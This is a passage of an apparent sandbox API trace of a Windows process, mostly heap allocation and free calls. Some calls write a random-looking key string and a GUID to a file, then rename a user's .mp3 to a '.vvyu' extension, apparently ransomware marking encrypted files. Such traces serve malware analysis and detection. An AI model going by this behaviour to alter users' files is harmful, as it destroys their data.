lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0195.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0195.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.631] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.631] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.631] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.631] CloseHandle (hObject=0x584) returned 1 [0195.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0195.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.634] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\Y3zc_VVY6Kxz1vjr.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\y3zc_vvy6kxz1vjr.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\Y3zc_VVY6Kxz1vjr.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\y3zc_vvy6kxz1vjr.mp3.vvyu")) returned 1 [0195.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.637] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.640] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x642fc170, ftCreationTime.dwHighDateTime=0x1d89fe8, ftLastAccessTime.dwLowDateTime=0x9c414fd0, ftLastAccessTime.dwHighDateTime=0x1d8a1b8, ftLastWriteTime.dwLowDateTime=0x9c414fd0, ftLastWriteTime.dwHighDateTime=0x1d8a1b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="znTr-YRiXJ", cAlternateFileName="ZNTR-Y~1")) returned 1 [0195.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0195.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0195.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ae8f30 [0195.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0195.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0195.641] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x642fc170, ftCreationTime.dwHighDateTime=0x1d89fe8, ftLastAccessTime.dwLowDateTime=0x9c414fd0, ftLastAccessTime.dwHighDateTime=0x1d8a1b8, ftLastWriteTime.dwLowDateTime=0x9c414fd0, ftLastWriteTime.dwHighDateTime=0x1d8a1b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="znTr-YRiXJ", cAlternateFileName="ZNTR-Y~1")) returned 0 [0195.642] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0195.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0195.643] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0195.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0195.643] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0195.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0195.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0195.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0195.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0195.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0195.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0195.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0195.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0195.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0195.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0195.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 